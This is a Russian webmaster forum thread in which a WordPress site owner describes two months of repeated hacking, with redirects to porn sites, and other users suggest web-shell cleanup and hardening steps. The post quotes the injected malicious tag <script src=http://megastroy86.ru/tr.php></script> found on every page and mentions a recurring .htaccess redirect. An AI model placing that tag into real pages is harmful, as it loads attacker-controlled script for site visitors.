- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Все что нужно знать о DDоS-атаках грамотному менеджеру
И как реагировать на "пожар", когда неизвестно, где хранятся "огнетушители
Антон Никонов
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Сайт два месяца подвергается взломам. И, верите, ничего не можем сделать. Постоянно переадресации на девочки.сз на отсос.ру , мобильная переадресация на обновление оперы и тп.
Обращались к специалистам, никто не мог помочь. Потом нашли, вроде, серьезного специалиста. Он - единственный, кто смог это остановить. Обновил движок, ужесточил права, что-то там зашил, сказал перенести на vps (правда, с партнерской ссылкой, ну да ладно). Взял 4400 руб. Неделю после "уборки" у него был период беспл поддержки. Потом пришло письмо, что поддержка закончилась, но за 4400 в месяц можно обеспечить круглосуточный контроль.
В день получения письма сайт снова был взломан. Сейчас снова перенаправления на проституток, снова упала на 30% посещаемость, траст, снова санкции поисковиков. Денег потеряли немеряно.
Он говорит, что дело во мне, что только через фтп возможно это сделать. Но я меняю пароли несколько раз в день, и уже их даже не помню просто. Ни у кого нет доступа к моему нетбуку. Комп проверен авастом и Dr web cure it вчера и нет ничего.
Его работа по недельной безопасности за 4400 руб закончилась.
Я руками чистила сайт от скрипта
<script src=http://megastroy86.ru/tr.php></script>
на каждой странице
но то ли он еще где-то остался, то ли он прописывается сам.
В .htaccess так и висит переадресация на opera123.net - я стираю, она появляется снова.
Вчера просто парень с фри-ланса за 250 рублей удалил очередную хакерскую закладку, при том, что сайт только про прошел процесс у дорогого спеца.
Тот спец говорит "за ваш сайт очень серьезно взялись". Иногда в комментариях приходит "hack again"?
Я только не понимаю, нахрена перенаправлять с чисто женского сайта на отсос ру? конвертация нулевая.
Последний раз в spb.devochki.ru рефферал был pund
Два месяца продолжается этот кошмар. Главное, что потеряно много денег, репутация, и никто не может помочь.
что-нам-делать?
может быть что угодно
у вас у самой какой стоит антивирус? (пользуйтесь каспером...)
что за движок? если самописный то это неконтролируемый вариант...))
еще совет убейте этот мегастрой86. просто пожалуйтесь везде напишите хостеру, домейнеру чтобы убили ли этот домен или этот пхп или ява на хосте там)))
У вас шелл на сайте залит! У меня была такая же ситуация! В каждой папке был залит хакерский .htaccess перенаправляющий, 404, 502 ошибки на свои порнушные сайты. Также везде в футере понапихали ссылки свои. При попытке удаления .htaccess через пару минут он появлялся снова!
Мне помог скрипт ai-bolit, погуглите и найдете без труда. Здесь на форуме его тоже обсуждали.
C помощью его нашел шелл с помощью которого заливали файлы и меняли права доступа к папкам. Удалил шелл, потом выставил минимальные права доступа на папки - закрыл все на запись. Почистил файлы от ссылок и все прекратилось!
И еще в панели хостинга отключите возможность доступа к сайту по FTP, пароли воруют очень легко, особенно из Total Commander/
Спасибо, посмотрю этот скрипт. Движок вордпресс. Антивирус Avast Internet Security. Вчера сканировала Dr Web cure it.
Дело в том, что все шеллы удалил тот спец, он говорит, что новые мне залили по фтп. Мы только в хронологии с ним расходимся, тк пароль фтп был у меня и до окончания периода поддержки, когда все было нормально. Но я не претендую. В безопасности ноль.
Как убить мегастрой? Сделать это можно только по решению суда, или я ошибаюсь?
Вообще, я реально не понимаю, зачем жещин перенаправлять на проституток, ну не слелают они ни одного заказа, ну что за бред вообще.
1. Сохранить базу данных сайта.
2. Сменить хостинг.
3. Сменить провайдера услуг (айтишника).
4. Переустановить систему на рабочем компьютере с заведомо легальных копий. Самый простой способ винда + штатный бесплатный антивирус. Можно поставить линукс.
5. Установить на сайт движок с нуля, с заведомо достоверного дистрибутива.
6. Восстановить данные со старого сайта.
7. Не использовать нигде одинаковые пароли.
8. Не устанавливать пиратские фтп-клиенты и подобный Г-софт.
9. Работать в дальнейшем с нормальными специалистами.
Шелл можно найти и по другому - поставьте антивирус нормальный, во-первых. Аваст - жуткое глючное гуано. Поставьте бесплатную Avira - http://www.avira.com/ , потом скачайте по фтп весь сайт и прогоните по этой папке проверку. Наверняка найдете много интересного.
А насчет того, в чем смысл - может это конкуренты так вас топят.
Все ваши признаки похоже на наличие шелла или дырявый хост, вы пробывали хост менять?
Хост да, поменяли. На тот, который порекомендовал удаливший все специалист.
Я хочу понять, каким образом у меня воруются из фтп пароли, если две программы мне говорят, что ничего не обнаружено.
Антивирус — не гарантия безопасности.
Ещё раз. Антивирус — не гарантия безопасности.
Понятно?
Повышать культуру пользования вычислительной техникой, прежде всего.
Хост да, поменяли. На тот, который порекомендовал удаливший все специалист.
Я хочу понять, каким образом у меня воруются из фтп пароли, если две программы мне говорят, что ничего не обнаружено.
Вы уверенны, что не переносите шеллл вместе с сайтом?
Движок вордпресс.
проверьте, обновлен ли Timthumb.php у вас, если он используется